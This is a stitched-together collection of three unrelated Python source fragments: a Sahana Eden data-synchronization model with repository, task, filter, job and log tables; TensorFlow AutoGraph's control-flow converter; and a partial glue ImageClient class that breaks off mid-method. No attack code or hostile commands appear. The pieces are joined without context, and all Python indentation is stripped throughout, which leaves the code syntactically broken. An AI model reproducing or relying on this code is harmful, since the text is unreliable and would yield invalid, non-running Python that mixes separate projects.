# -------------------------------------------------------------------------
tablename = "sync_status"
define_table(tablename,
Field("running", "boolean",
default=False,
readable=False,
writable=False),
Field("manual", "boolean",
default=False,
readable=False,
writable=False),
Field("timestmp", "datetime",
readable=False,
writable=False))
# -------------------------------------------------------------------------
# Repository
# -------------------------------------------------------------------------
sync_repository_types = {
"eden": "Sahana Eden",
"ccrm": "CiviCRM",
"wrike": "Wrike",
"mcb": "Mariner CommandBridge",
}
tablename = "sync_repository"
define_table(tablename,
Field("name", length=64, notnull=True,
comment = DIV(_class="tooltip",
_title="%s|%s" % (
T("Repository Name"),
T("Name of the repository (for you own reference)"))),
),
Field("apitype",
label=T("Repository Type"),
requires = IS_IN_SET(sync_repository_types),
default = "eden",
represent = lambda opt: \
NONE if not opt else \
sync_repository_types.get(opt, NONE),
),
Field("url",
label="URL",
requires = IS_EMPTY_OR(
IS_NOT_IN_DB(db, "sync_repository.url")),
comment = DIV(_class="tooltip",
_title="%s|%s" % (
T("Repository Base URL"),
T("Base URL of the remote Sahana Eden instance including application path, e.g. http://www.example.org/eden"))),
),
Field("username",
comment = DIV(_class="tooltip",
_title="%s|%s" % (
T("Username"),
T("Username to use for authentication at the remote site."))),
),
Field("password", "password",
comment = DIV(_class="tooltip",
_title="%s|%s" % (
T("Password"),
T("Password to use for authentication at the remote site."))),
),
Field("client_id",
label = T("Client ID"),
comment = DIV(_class="tooltip",
_title="%s|%s" % (
T("Client ID"),
T("The client ID to use for authentication at the remote site (if required for this type of repository)."))),
),
Field("client_secret", "password",
label = T("Client Secret"),
comment = DIV(_class="tooltip",
_title="%s|%s" % (
T("Client Secret"),
T("The client secret to use for authentication at the remote site (if required for this type of repository)."))),
),
Field("site_key",
label = T("Site Key"),
comment = DIV(_class="tooltip",
_title="%s|%s" % (
T("Site Key"),
T("Site Key which this site uses to authenticate at the remote site (if required for this type of repository)."))),
),
Field("refresh_token",
readable = False,
writable = False,
),
Field("proxy",
label=T("Proxy Server URL"),
requires=IS_EMPTY_OR(IS_URL(mode="generic")),
comment = DIV(_class="tooltip",
_title="%s|%s" % (
T("Proxy Server URL"),
T("URL of the proxy server to connect to the repository (leave empty for default proxy)"))),
),
Field("last_status",
readable=False,
writable=False,
label=T("Last status"),
),
Field("accept_push", "boolean",
represent = s3_yes_no_represent,
default=False,
label=T("Accept Push"),
comment = DIV(_class="tooltip",
_title="%s|%s" % (
T("Accept Push"),
T("Accept unsolicited data transmissions from the repository."))),
),
Field.Method("last_pull_time",
self.sync_repository_last_pull_time),
Field.Method("last_push_time",
self.sync_repository_last_push_time),
*s3_meta_fields())
# CRUD Strings
ADD_REPOSITORY = T("Create Repository")
crud_strings[tablename] = Storage(
label_create = ADD_REPOSITORY,
title_display = T("Repository Configuration"),
title_list = T("Repositories"),
title_update = T("Edit Repository Configuration"),
label_list_button = T("List Repositories"),
msg_record_created = T("Repository configured"),
msg_record_modified = T("Repository configuration updated"),
msg_record_deleted = T("Repository configuration deleted"),
msg_list_empty = T("No repositories configured"))
# Resource Configuration
configure(tablename,
list_fields=["name",
"uuid",
"accept_push",
(T("Last Pull"), "last_pull_time"),
(T("Last Push"), "last_push_time"),
],
onaccept=self.sync_repository_onaccept,
ondelete=self.sync_repository_ondelete,
create_next=URL(c="sync",
f="repository",
args=["[id]", "task"],
),
update_next=URL(c="sync",
f="repository",
args=["[id]"],
)
)
set_method("sync", "repository", method="now", action=sync_now)
# Reusable Fields
repository_id = S3ReusableField("repository_id", "reference %s" % tablename,
requires = IS_ONE_OF(db,
"sync_repository.id",
"%(name)s"),
represent = self.sync_repository_represent,
label = T("Repository"))
# Components
add_components(tablename,
sync_task="repository_id",
sync_log="repository_id",
#sync_conflict="repository_id",
**{# Scheduler Jobs
S3Task.TASK_TABLENAME: {"name": "job",
"joinby": "repository_id",
"link": "sync_job",
"key": "scheduler_task_id",
"actuate": "replace",
},
}
)
# -------------------------------------------------------------------------
# Task
# -------------------------------------------------------------------------
# Synchronization mode
sync_mode = {
1: T("pull"), # pull only
2: T("push"), # push only
3: T("pull and push"), # pull & push
4: T("none") # do not synchronize this resource
}
# Strategy (allowed import methods)
sync_strategy = S3ImportItem.METHOD
sync_strategy_represent = lambda opt: opt and \
", ".join([o for o in sync_strategy.values()
if o in opt]) or NONE
# Update method
sync_update_method = {
1: T("update"), # update the existing record
2: T("replace"), # replace the existing record
}
# Update/conflict resolution policy
sync_policies = S3ImportItem.POLICY
sync_policy = {
sync_policies.OTHER: T("always update"),
sync_policies.NEWER: T("update if newer"),
sync_policies.MASTER: T("update if master"),
sync_policies.THIS: T("never update")
}
sync_policy_represent = lambda opt: \
opt and sync_policy.get(opt, UNKNOWN_OPT) or NONE
tablename = "sync_task"
define_table(tablename,
repository_id(),
Field("resource_name",
notnull=True),
Field("last_pull", "datetime",
readable=True,
writable=False,
label=T("Last pull on")),
Field("last_push", "datetime",
readable=True,
writable=False,
label=T("Last push on")),
Field("mode", "integer",
requires = IS_IN_SET(sync_mode,
zero=None),
default = 3,
label = T("Mode"),
represent = lambda opt: \
sync_mode.get(opt, NONE)),
Field("strategy", "list:string",
requires = IS_IN_SET(sync_strategy.values(),
multiple=True,
zero=None),
default = sync_strategy.values(),
label = T("Strategy"),
represent = sync_strategy_represent,
widget = CheckboxesWidgetS3.widget),
Field("update_method", "integer",
# hide while not implemented
readable=False,
writable=False,
requires = IS_IN_SET(sync_update_method,
zero=None),
default = 1,
label = T("Update Method"),
represent = lambda opt: \
sync_update_method.get(opt,
NONE)),
Field("update_policy",
requires = IS_IN_SET(sync_policies,
zero=None),
default = sync_policies.NEWER,
label = T("Update Policy"),
represent = sync_policy_represent),
Field("conflict_policy",
requires = IS_IN_SET(sync_policies,
zero=None),
default = sync_policies.NEWER,
label = T("Conflict Policy"),
represent = sync_policy_represent),
*s3_meta_fields())
# Field configuration
# @todo: make in-line
table = db[tablename]
table.resource_name.comment = DIV(_class="tooltip",
_title="%s|%s" % (
T("Resource Name"),
T("Table name of the resource to synchronize")))
table.mode.comment = DIV(_class="tooltip",
_title="%s|%s" % (
T("Synchronization mode"),
T("How data shall be transferred")))
table.strategy.comment = DIV(_class="tooltip",
_title="%s|%s" % (
T("Strategy"),
T("Which methods to apply when importing data to the local repository")))
table.update_method.comment = DIV(_class="tooltip",
_title="%s|%s" % (
T("Update Method"),
T("How local records shall be updated")))
table.update_policy.comment = DIV(_class="tooltip",
_title="%s|%s" % (
T("Update Policy"),
T("Under which conditions local records shall be updated")))
table.conflict_policy.comment = DIV(_class="tooltip",
_title="%s|%s" % (
T("Conflict Policy"),
T("Under which condition a local record shall be updated if it also has been modified locally since the last synchronization")))
# CRUD Strings
ADD_TASK = T("Create Resource")
crud_strings[tablename] = Storage(
label_create = ADD_TASK,
title_display = T("Resource Configuration"),
title_list = T("Resources"),
title_update = T("Edit Resource Configuration"),
label_list_button = T("List Resources"),
msg_record_created = T("Resource configured"),
msg_record_modified = T("Resource configuration updated"),
msg_record_deleted = T("Resource configuration deleted"),
msg_list_empty = T("No resources configured yet"))
# Resource Configuration
configure(tablename,
create_onvalidation=self.sync_task_onvalidation)
# Reusable Field
task_represent = self.sync_task_represent
task_id = S3ReusableField("task_id", "reference %s" % tablename,
requires = IS_ONE_OF(db,
"sync_task.id",
task_represent),
represent = task_represent,
label = T("Task"))
# Components
add_components(tablename,
sync_resource_filter="task_id",
)
# -------------------------------------------------------------------------
# Filters
# -------------------------------------------------------------------------
tablename = "sync_resource_filter"
define_table(tablename,
task_id(),
Field("tablename",
label = T("Table"),
requires = IS_NOT_EMPTY()),
Field("filter_string",
label = T("Filter"),
requires = IS_NOT_EMPTY()),
*s3_meta_fields())
onaccept = self.sync_resource_filter_onaccept
configure(tablename,
list_fields = ["id",
"task_id$repository_id",
"task_id$resource_name",
"tablename",
"filter_string"],
onaccept = onaccept,
ondelete = onaccept)
# -------------------------------------------------------------------------
# Job
# -------------------------------------------------------------------------
tablename = "sync_job"
define_table(tablename,
repository_id(),
s3.scheduler_task_id(),
*s3_meta_fields())
# CRUD Strings
ADD_JOB = T("Create Job")
crud_strings[tablename] = Storage(
label_create = ADD_JOB,
title_display = T("Synchronization Job"),
title_list = T("Synchronization Schedule"),
title_update = T("Edit Job"),
label_list_button = T("List Jobs"),
msg_record_created = T("Job added"),
msg_record_modified = T("Job updated"),
msg_record_deleted = T("Job deleted"),
msg_list_empty = T("No jobs configured yet"),
msg_no_match = T("No jobs configured"))
# Resource Configuration
set_method("sync", "repository",
component_name="job",
method="reset",
action=sync_job_reset)
# -------------------------------------------------------------------------
# Log
# -------------------------------------------------------------------------
tablename = "sync_log"
define_table(tablename,
Field("timestmp", "datetime",
represent=s3_datetime_represent,
label=T("Date/Time")),
repository_id(),
Field("resource_name"),
# Synchronization mode: PULL/PUSH, IN/OUT
Field("mode"),
Field("action"),
Field("result"),
Field("remote", "boolean",
default=False,
label=T("Remote Error"),
represent=lambda opt: opt and T("yes") or ("no")),
Field("message", "text",
represent=s3_strip_markup),
*s3_meta_fields())
# CRUD Strings
crud_strings[tablename] = Storage(
title_display = T("Log Entry"),
title_list = T("Synchronization Log"),
label_list_button = T("List All Entries"),
msg_record_deleted = T("Log Entry Deleted"),
msg_list_empty = T("No entries found"),
msg_no_match = T("No entries found"))
# Resource Configuration
configure(tablename,
editable=False,
insertable=False,
deletable=True,
orderby="sync_log.timestmp desc")
# ---------------------------------------------------------------------
# Return global names to s3.*
#
return Storage()
# -------------------------------------------------------------------------
def defaults(self):
""" Safe defaults if module is disabled """
return Storage()
# -------------------------------------------------------------------------
@staticmethod
def sync_repository_represent(rid):
""" Repository representation """
db = current.db
rtable = current.s3db.sync_repository
repository = db(rtable.id == rid).select(rtable.name,
limitby=(0, 1)).first()
try:
return repository.name
except:
return current.messages.UNKNOWN_OPT
# -------------------------------------------------------------------------
@staticmethod
def sync_repository_last_pull_time(row):
""" Last pull synchronization date/time for this repository """
try:
repository_id = row["sync_repository.id"]
except AttributeError:
return "-"
table = current.s3db.sync_task
query = (table.repository_id == repository_id)
task = current.db(query).select(orderby=~table.last_pull,
limitby=(0,1)).first()
if task and task.last_pull:
return S3DateTime.datetime_represent(task.last_pull, utc=True)
else:
return current.T("never")
# -------------------------------------------------------------------------
@staticmethod
def sync_repository_last_push_time(row):
""" Last push synchronization date/time for this repository """
try:
repository_id = row["sync_repository.id"]
except AttributeError:
return "-"
table = current.s3db.sync_task
query = (table.repository_id == repository_id)
task = current.db(query).select(orderby=~table.last_push,
limitby=(0,1)).first()
if task and task.last_push:
return S3DateTime.datetime_represent(task.last_push, utc=True)
else:
return current.T("never")
# -------------------------------------------------------------------------
@staticmethod
def sync_task_represent(task_id):
""" Task representation """
s3db = current.s3db
ttable = s3db.sync_task
rtable = s3db.sync_repository
query = (ttable.id == task_id) & \
(rtable.id == ttable.repository_id)
db = current.db
task = db(query).select(ttable.resource_name,
rtable.name,
limitby=(0, 1)).first()
UNKNOWN_OPT = current.messages.UNKNOWN_OPT
if task:
repository = task[rtable.name] or UNKNOWN_OPT
resource = task[ttable.resource_name] or UNKNOWN_OPT
return "%s: %s" % (repository, resource)
else:
return UNKNOWN_OPT
# -------------------------------------------------------------------------
@staticmethod
def sync_repository_ondelete(row):
"""
Cleanup after repository deletion
@todo: use standard delete cascade
"""
db = current.db
s3db = current.s3db
# Remove the URL to allow re-setup of the same repo
rtable = s3db.sync_repository
db(rtable.id == row.id).update(url=None)
# Delete all resources in this repository
ttable = s3db.sync_task
db(ttable.repository_id == row.id).update(deleted=True)
# Delete all jobs for this repository
# @todo: remove scheduler_task entry as well
jtable = s3db.sync_job
db(jtable.repository_id == row.id).update(deleted=True)
# Delete all pending conflicts of this repository
#ctable = s3db.sync_conflict
#db(ctable.repository_id == row.id).delete()
# Delete all log entries for this repository
ltable = s3db.sync_log
db(ltable.repository_id == row.id).delete()
return
# -------------------------------------------------------------------------
@staticmethod
def sync_repository_onaccept(form):
"""
Send registration request to the peer
"""
try:
repository_id = form.vars.id
except:
return
sync = current.sync
if repository_id:
rtable = current.s3db.sync_repository
query = (rtable.id == repository_id)
repository = current.db(query).select(limitby=(0, 1)).first()
if repository and repository.url:
from s3.s3sync import S3SyncRepository
connector = S3SyncRepository(repository)
success = connector.register()
if not success:
current.response.warning = \
current.T("Could not auto-register at the repository, please register manually.")
else:
current.response.confirmation = \
current.T("Successfully registered at the repository.")
return
# -------------------------------------------------------------------------
@staticmethod
def sync_task_onvalidation(form):
"""
Task record validation
"""
repository_id = form.vars.repository_id or \
current.request.post_vars.repository_id
resource_name = form.vars.resource_name
if repository_id and resource_name:
ttable = current.s3db.sync_task
query = (ttable.repository_id == repository_id) & \
(ttable.resource_name == resource_name) & \
(ttable.deleted != True)
row = current.db(query).select(ttable.id,
limitby=(0, 1)).first()
if row:
form.errors.resource_name = \
T("This resource is already configured for this repository")
# -------------------------------------------------------------------------
@staticmethod
def sync_resource_filter_onaccept(form):
"""
Reset last_push when adding/changing a filter
"""
db = current.db
s3db = current.s3db
ttable = s3db.sync_task
ftable = s3db.sync_resource_filter
if isinstance(form, Row):
filter_id = form.id
else:
try:
filter_id = form.vars.id
except:
return
row = db(ftable.id == filter_id).select(ftable.id,
ftable.deleted,
ftable.task_id,
ftable.deleted_fk,
limitby=(0, 1)).first()
if row:
task_id = None
if row.deleted:
try:
deleted_fk = json.loads(row.deleted_fk)
except:
return
if "task_id" in deleted_fk:
task_id = deleted_fk["task_id"]
else:
task_id = row.task_id
if task_id:
db(ttable.id == task_id).update(last_push=None)
return
# =============================================================================
def sync_rheader(r, tabs=[]):
"""
Synchronization resource headers
"""
if r.representation == "html":
if r.tablename == "sync_repository":
T = current.T
repository = r.record
if r.component and r.component_name=="log" and not r.component_id:
purge_log = A(T("Remove all log entries"),
_href=r.url(method="delete"))
else:
purge_log = ""
if repository:
if repository.url:
tabs.append((T("Manual Synchronization"), "now"))
rheader_tabs = s3_rheader_tabs(r, tabs)
rheader = DIV(TABLE(
TR(TH("%s: " % T("Name")),
repository.name,
TH(""),
purge_log),
TR(TH("URL: "),
repository.url,
TH(""),
""),
), rheader_tabs)
return rheader
return None
# =============================================================================
def sync_job_reset(r, **attr):
"""
RESTful method to reset a job status from FAILED to QUEUED,
for "Reset" action button
"""
if r.interactive:
if r.component and r.component.alias == "job":
job_id = r.component_id
if job_id:
S3Task.reset(job_id)
current.session.confirmation = current.T("Job reactivated")
r.component_id = None
redirect(r.url(method=""))
# =============================================================================
def sync_now(r, **attr):
"""
Manual synchronization of a repository
@param r: the S3Request
@param attr: controller options for the request
"""
T = current.T
auth = current.auth
response = current.response
rheader = attr.get("rheader", None)
if rheader:
rheader = rheader(r)
output = dict(title=T("Manual Synchronization"), rheader=rheader)
s3task = current.s3task
sync = current.sync
if not auth.s3_logged_in():
auth.permission.fail()
if r.interactive:
if r.http in ("GET", "POST"):
repository = r.record
if not repository:
r.error(404, current.ERROR.BAD_RECORD)
form = FORM(TABLE(
TR(TD(T("Click 'Start' to synchronize with this repository now:"))),
TR(TD(INPUT(_type="submit", _value=T("Start"))))))
if form.accepts(r.post_vars, current.session):
task_id = s3task.async("sync_synchronize",
args = [repository.id],
vars = dict(user_id=auth.user.id,
manual=True))
if task_id is False:
response.error = T("Could not initiate manual synchronization.")
elif task_id is None:
response.flash = T("Manual synchronization completed.")
else:
sync.set_status(manual=True)
response.flash = T("Manual synchronization started in the background.")
else:
r.error(405, current.ERROR.BAD_METHOD)
else:
r.error(501, current.ERROR.BAD_FORMAT)
status = sync.get_status()
if status.running:
output.update(form=T("Synchronization currently active - refresh page to update status."))
elif not status.manual:
output.update(form=form)
else:
output.update(form=T("Manual synchronization scheduled - refresh page to update status."))
response.view = "update.html"
return output
# END =========================================================================
| |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Handles control flow statements: while, for, if."""
import gast
from tensorflow.python.autograph.core import converter
from tensorflow.python.autograph.lang import directives
from tensorflow.python.autograph.pyct import anno
from tensorflow.python.autograph.pyct import cfg
from tensorflow.python.autograph.pyct import origin_info
from tensorflow.python.autograph.pyct import parser
from tensorflow.python.autograph.pyct import qual_names
from tensorflow.python.autograph.pyct import templates
from tensorflow.python.autograph.pyct.static_analysis import activity
from tensorflow.python.autograph.pyct.static_analysis import annos
from tensorflow.python.autograph.pyct.static_analysis import liveness
from tensorflow.python.autograph.pyct.static_analysis import reaching_definitions
from tensorflow.python.autograph.pyct.static_analysis import reaching_fndefs
class _Function(object):
scope = None
class ControlFlowTransformer(converter.Base):
"""Transforms control flow structures like loops an conditionals."""
def visit_Lambda(self, node):
with self.state[_Function] as fn:
fn.scope = anno.getanno(node, anno.Static.SCOPE)
return self.generic_visit(node)
def visit_FunctionDef(self, node):
with self.state[_Function] as fn:
fn.scope = anno.getanno(node, annos.NodeAnno.BODY_SCOPE)
return self.generic_visit(node)
def _create_nonlocal_declarations(self, vars_):
vars_ = set(vars_)
results = []
global_vars = self.state[_Function].scope.globals & vars_
if global_vars:
results.append(gast.Global([str(v) for v in global_vars]))
nonlocal_vars = [
v for v in vars_ if not v.is_composite() and v not in global_vars]
if nonlocal_vars:
results.append(gast.Nonlocal([str(v) for v in nonlocal_vars]))
return results
def _create_state_functions(
self, block_vars, nonlocal_declarations, getter_name, setter_name):
if not block_vars:
template = """
def getter_name():
return ()
def setter_name(block_vars):
pass
"""
return templates.replace(
template, getter_name=getter_name, setter_name=setter_name)
guarded_block_vars = []
for v in block_vars:
if v.is_simple():
guarded_block_vars.append(v)
else:
guarded_block_vars.append(
templates.replace_as_expression(
'ag__.ldu(lambda: var_, name)',
var_=v,
name=gast.Constant(str(v), kind=None)))
template = """
def getter_name():
return guarded_state_vars,
def setter_name(vars_):
nonlocal_declarations
state_vars, = vars_
"""
return templates.replace(
template,
nonlocal_declarations=nonlocal_declarations,
getter_name=getter_name,
guarded_state_vars=guarded_block_vars,
setter_name=setter_name,
state_vars=tuple(block_vars))
def _create_loop_options(self, node):
if not anno.hasanno(node, anno.Basic.DIRECTIVES):
return gast.Dict([], [])
loop_directives = anno.getanno(node, anno.Basic.DIRECTIVES)
if directives.set_loop_options not in loop_directives:
return gast.Dict([], [])
opts_dict = loop_directives[directives.set_loop_options]
str_keys, values = zip(*opts_dict.items())
keys = [gast.Constant(s, kind=None) for s in str_keys]
values = list(values) # ast and gast don't play well with tuples.
return gast.Dict(keys, values)
def _create_undefined_assigns(self, undefined_symbols):
assignments = []
for s in undefined_symbols:
template = '''
var = ag__.Undefined(symbol_name)
'''
assignments += templates.replace(
template,
var=s,
symbol_name=gast.Constant(s.ssf(), kind=None))
return assignments
def _get_block_basic_vars(self, modified, live_in, live_out):
nonlocals = self.state[_Function].scope.nonlocals
basic_scope_vars = []
for s in modified:
if s.is_composite():
# TODO(mdan): Raise an error when this happens for a TF scope.
continue
# Variables not live into or out of the scope are considered local to the
# scope.
if s in live_in or s in live_out or s in nonlocals:
basic_scope_vars.append(s)
continue
return frozenset(basic_scope_vars)
def _get_block_composite_vars(self, modified, live_in):
# The scope variables corresponding to composite symbols (e.g. `self.x`).
composite_scope_vars = []
for s in modified:
if not s.is_composite():
continue
# Mutations made to objects created inside the scope will appear as writes
# to composite symbols. Because these mutations appear as modifications
# made to composite symbols, we check whether the composite's parent is
# actually live into the scope.
# Example:
# while cond:
# x = Foo()
# x.foo = 2 * x.foo # x.foo is live into the scope, but x is not.
#
# Note that some parents might not be symbols - for example, in x['foo'],
# 'foo' is a parent, but it's a literal, not a symbol. We don't check the
# liveness of literals.
support_set_symbols = tuple(
sss for sss in s.support_set if sss.is_symbol())
if not all(sss in live_in for sss in support_set_symbols):
continue
composite_scope_vars.append(s)
return frozenset(composite_scope_vars)
def _get_block_vars(self, node, modified):
"""Determines the variables affected inside a control flow statement."""
defined_in = anno.getanno(node, anno.Static.DEFINED_VARS_IN)
live_in = anno.getanno(node, anno.Static.LIVE_VARS_IN)
live_out = anno.getanno(node, anno.Static.LIVE_VARS_OUT)
fn_scope = self.state[_Function].scope
basic_scope_vars = self._get_block_basic_vars(
modified,
live_in,
live_out)
composite_scope_vars = self._get_block_composite_vars(modified, live_in)
scope_vars = tuple(basic_scope_vars | composite_scope_vars)
# Variables that are modified inside the scope, but not defined
# before entering it. Only simple variables must be defined. The
# composite ones will be implicitly checked at runtime.
possibly_undefined = (
modified - defined_in - fn_scope.globals - fn_scope.nonlocals)
undefined = tuple(v for v in possibly_undefined if not v.is_composite())
# Variables that are modified inside the scope, and depend on values outside
# it.
input_only = basic_scope_vars & live_in - live_out
# Place the outputs first, then sort lexicographically.
scope_vars = sorted(scope_vars, key=lambda v: (v in input_only, v))
nouts = len(scope_vars) - len(input_only)
return scope_vars, undefined, nouts
def visit_If(self, node):
node = self.generic_visit(node)
body_scope = anno.getanno(node, annos.NodeAnno.BODY_SCOPE)
orelse_scope = anno.getanno(node, annos.NodeAnno.ORELSE_SCOPE)
cond_vars, undefined, nouts = self._get_block_vars(
node, body_scope.bound | orelse_scope.bound)
undefined_assigns = self._create_undefined_assigns(undefined)
nonlocal_declarations = self._create_nonlocal_declarations(cond_vars)
reserved = body_scope.referenced | orelse_scope.referenced
state_getter_name = self.ctx.namer.new_symbol('get_state', reserved)
state_setter_name = self.ctx.namer.new_symbol('set_state', reserved)
state_functions = self._create_state_functions(
cond_vars, nonlocal_declarations, state_getter_name, state_setter_name)
orelse_body = node.orelse
if not orelse_body:
orelse_body = [gast.Pass()]
template = """
state_functions
def body_name():
nonlocal_declarations
body
def orelse_name():
nonlocal_declarations
orelse
undefined_assigns
ag__.if_stmt(
test,
body_name,
orelse_name,
state_getter_name,
state_setter_name,
(symbol_names,),
nouts)
"""
new_nodes = templates.replace(
template,
body=node.body,
body_name=self.ctx.namer.new_symbol('if_body', reserved),
orelse=orelse_body,
orelse_name=self.ctx.namer.new_symbol('else_body', reserved),
nonlocal_declarations=nonlocal_declarations,
nouts=gast.Constant(nouts, kind=None),
state_functions=state_functions,
state_getter_name=state_getter_name,
state_setter_name=state_setter_name,
symbol_names=tuple(gast.Constant(str(s), kind=None) for s in cond_vars),
test=node.test,
undefined_assigns=undefined_assigns)
origin_info.copy_origin(node, new_nodes[-1])
return new_nodes
def visit_While(self, node):
node = self.generic_visit(node)
body_scope = anno.getanno(node, annos.NodeAnno.BODY_SCOPE)
loop_vars, undefined, _ = self._get_block_vars(node, body_scope.bound)
undefined_assigns = self._create_undefined_assigns(undefined)
nonlocal_declarations = self._create_nonlocal_declarations(loop_vars)
reserved = body_scope.referenced
state_getter_name = self.ctx.namer.new_symbol('get_state', reserved)
state_setter_name = self.ctx.namer.new_symbol('set_state', reserved)
state_functions = self._create_state_functions(
loop_vars, nonlocal_declarations, state_getter_name, state_setter_name)
opts = self._create_loop_options(node)
template = """
state_functions
def body_name():
nonlocal_declarations
body
def test_name():
return test
undefined_assigns
ag__.while_stmt(
test_name,
body_name,
state_getter_name,
state_setter_name,
(symbol_names,),
opts)
"""
new_nodes = templates.replace(
template,
body=node.body,
body_name=self.ctx.namer.new_symbol('loop_body', reserved),
nonlocal_declarations=nonlocal_declarations,
opts=opts,
state_functions=state_functions,
state_getter_name=state_getter_name,
state_setter_name=state_setter_name,
symbol_names=tuple(gast.Constant(str(s), kind=None) for s in loop_vars),
test=node.test,
test_name=self.ctx.namer.new_symbol('loop_test', reserved),
undefined_assigns=undefined_assigns)
origin_info.copy_origin(node, new_nodes[-1])
return new_nodes
def visit_For(self, node):
node = self.generic_visit(node)
body_scope = anno.getanno(node, annos.NodeAnno.BODY_SCOPE)
iter_scope = anno.getanno(node, annos.NodeAnno.ITERATE_SCOPE)
loop_vars, undefined, _ = self._get_block_vars(
node, body_scope.bound | iter_scope.bound)
undefined_assigns = self._create_undefined_assigns(undefined)
nonlocal_declarations = self._create_nonlocal_declarations(loop_vars)
reserved = body_scope.referenced | iter_scope.referenced
state_getter_name = self.ctx.namer.new_symbol('get_state', reserved)
state_setter_name = self.ctx.namer.new_symbol('set_state', reserved)
state_functions = self._create_state_functions(
loop_vars, nonlocal_declarations, state_getter_name, state_setter_name)
opts = self._create_loop_options(node)
opts.keys.append(gast.Constant('iterate_names', kind=None))
opts.values.append(gast.Constant(
parser.unparse(node.target, include_encoding_marker=False), kind=None))
if anno.hasanno(node, anno.Basic.EXTRA_LOOP_TEST):
extra_test = anno.getanno(node, anno.Basic.EXTRA_LOOP_TEST)
extra_test_name = self.ctx.namer.new_symbol(
'extra_test', reserved)
template = """
def extra_test_name():
nonlocal_declarations
return extra_test_expr
"""
extra_test_function = templates.replace(
template,
extra_test_expr=extra_test,
extra_test_name=extra_test_name,
loop_vars=loop_vars,
nonlocal_declarations=nonlocal_declarations)
else:
extra_test_name = parser.parse_expression('None')
extra_test_function = []
# iterate_arg_name holds a single arg with the iterates, which may be a
# tuple.
iterate_arg_name = self.ctx.namer.new_symbol('itr', reserved)
template = """
iterates = iterate_arg_name
"""
iterate_expansion = templates.replace(
template, iterate_arg_name=iterate_arg_name, iterates=node.target)
origin_info.copy_origin(node, iterate_expansion)
template = """
state_functions
def body_name(iterate_arg_name):
nonlocal_declarations
iterate_expansion
body
extra_test_function
undefined_assigns
ag__.for_stmt(
iterated,
extra_test_name,
body_name,
state_getter_name,
state_setter_name,
(symbol_names,),
opts)
"""
new_nodes = templates.replace(
template,
body=node.body,
body_name=self.ctx.namer.new_symbol('loop_body', reserved),
extra_test_function=extra_test_function,
extra_test_name=extra_test_name,
iterate_arg_name=iterate_arg_name,
iterate_expansion=iterate_expansion,
iterated=node.iter,
nonlocal_declarations=nonlocal_declarations,
opts=opts,
symbol_names=tuple(gast.Constant(str(s), kind=None) for s in loop_vars),
state_functions=state_functions,
state_getter_name=state_getter_name,
state_setter_name=state_setter_name,
undefined_assigns=undefined_assigns)
origin_info.copy_origin(node, new_nodes[-1])
return new_nodes
class AnnotatedDef(reaching_definitions.Definition):
def __init__(self):
super(AnnotatedDef, self).__init__()
self.directives = {}
def transform(node, ctx):
graphs = cfg.build(node)
node = qual_names.resolve(node)
node = activity.resolve(node, ctx, None)
node = reaching_definitions.resolve(node, ctx, graphs)
node = reaching_fndefs.resolve(node, ctx, graphs)
node = liveness.resolve(node, ctx, graphs)
node = ControlFlowTransformer(ctx).visit(node)
return node
| |
from __future__ import absolute_import, division, print_function
import logging
from functools import wraps
import numpy as np
from ..external.modest_image import extract_matched_slices
from ..core.exceptions import IncompatibleAttribute
from ..core.data import Data
from ..core.subset import Subset, RoiSubsetState
from ..core.roi import PolygonalROI
from ..core.message import ComponentReplacedMessage
from ..core.callback_property import (
callback_property, CallbackProperty)
from ..core.edit_subset_mode import EditSubsetMode
from ..utils import lookup_class, defer_draw
from .viz_client import VizClient, init_mpl
from .layer_artist import (ScatterLayerArtist, LayerArtistContainer,
ImageLayerArtist, SubsetImageLayerArtist,
RGBImageLayerArtist,
ImageLayerBase, RGBImageLayerBase,
SubsetImageLayerBase, ScatterLayerBase)
def requires_data(func):
"""Decorator that checks an ImageClient for a non-null display_data
attribute. Only executes decorated function if present"""
@wraps(func)
def result(*args, **kwargs):
if args[0].display_data is None:
return
return func(*args, **kwargs)
return result
class ImageClient(VizClient):
display_data = CallbackProperty(None)
display_attribute = CallbackProperty(None)
def __init__(self, data, artist_container=None):
VizClient.__init__(self, data)
self.artists = artist_container
if self.artists is None:
self.artists = LayerArtistContainer()
# slice through ND cube
# ('y', 'x', 2)
# means current data slice is [:, :, 2], and axis=0 is vertical on plot
self._slice = None
# how to extract a downsampled/cropped 2D image to plot
# (ComponentID, slice, slice, ...)
self._view = None
# cropped/downsampled image
# self._image == self.display_data[self._view]
self._image = None
# if this is set, render this instead of self._image
self._override_image = None
# maps attributes -> normalization settings
self._norm_cache = {}
def point_details(self, x, y):
if self.display_data is None:
return dict(labels=['x=%s' % x, 'y=%s' % y],
pix=(x, y), world=(x, y), value=np.nan)
data = self.display_data
pix = self._pixel_coords(x, y)
labels = self.coordinate_labels(pix)
world = data.coords.pixel2world(*pix[::-1])
world = world[::-1] # reverse for numpy convention
view = []
for p, s in zip(pix, data.shape):
p = int(p)
if not (0 <= p < s):
value = None
break
view.append(slice(p, p + 1))
else:
if self._override_image is None:
value = self.display_data[self.display_attribute, view]
else:
value = self._override_image[int(y), int(x)]
value = value.ravel()[0]
return dict(pix=pix, world=world, labels=labels, value=value)
def coordinate_labels(self, pix):
""" Return human-readable labels for a position in pixel coords
:param pix: tuple of ints
Pixel coordiante of point in the data
:returns: List of strings, one for each coordinate axis, of the
form "axis_lable_name=world_coordinate_value
:note: pix describes a position in the *data*, not necessarily
the image display
"""
data = self.display_data
if data is None:
return []
world = data.coords.pixel2world(*pix[::-1])
world = world[::-1] # reverse for numpy convention
labels = ['%s=%s' % (data.get_world_component_id(i).label, w)
for i, w in enumerate(world)]
return labels
@callback_property
def slice(self):
"""
Returns a tuple describing the current slice through the data
The tuple has length equal to the dimensionality of the display
data. Each entry is either:
'x' if the dimension is mapped to the X image axis
'y' if the dimension is mapped to the Y image axis
a number, indicating which fixed slice the dimension is restricted to
"""
if self._slice is not None:
return self._slice
if self.display_data is None:
return tuple()
ndim = self.display_data.ndim
if ndim == 1:
self._slice = ('x',)
elif ndim == 2:
self._slice = ('y', 'x')
else:
self._slice = (0,) * (ndim - 2) + ('y', 'x')
return self._slice
@slice.setter
@defer_draw
def slice(self, value):
if self.slice == tuple(value):
return
